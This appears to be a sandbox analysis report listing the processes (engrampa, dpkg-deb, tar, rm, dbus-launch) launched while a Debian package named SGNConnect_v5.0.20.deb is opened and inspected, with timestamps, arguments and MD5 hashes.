    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    File Activities

    Process Activities

    System Activities

    Network Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/dbus-launch
    Arguments:dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    File size:34960 bytes
    MD5 hash:0b22a45154a51c6121bb1d208d8ab203

    File Activities

    System Activities

    Network Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:dpkg-deb -I /tmp/SGNConnect_v5.0.20.deb
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    File Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/tar
    Arguments:tar -x -m -f - --warning=no-timestamp
    File size:448112 bytes
    MD5 hash:586e1b7caf47a43f5be28968dd4a7329

    File Activities

    Network Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/rm
    Arguments:rm -rf -- /tmp/dpkg-deb.7lBi6l
    File size:72056 bytes
    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

    File Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:-
    File size:492616 bytes
    MD5 hash:39fede466e21a42b973e73b62cc7fc09

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:dpkg-deb -c /tmp/SGNConnect_v5.0.20.deb
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    File Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/dpkg-deb
    Arguments:-
    File size:178728 bytes
    MD5 hash:138cc2b338ff91da07bf7ad1ba786d25

    Process Activities


    General

    Start time (UTC):23:21:28
    Start date (UTC):02/04/2025
    Path:/usr/bin/tar
    Arguments:tar -tv -f - --warning=no-timestamp
    File size:448112 bytes
    MD5 hash:586e1b7caf47a43f5be28968dd4a7329

    File Activities

    Network Activities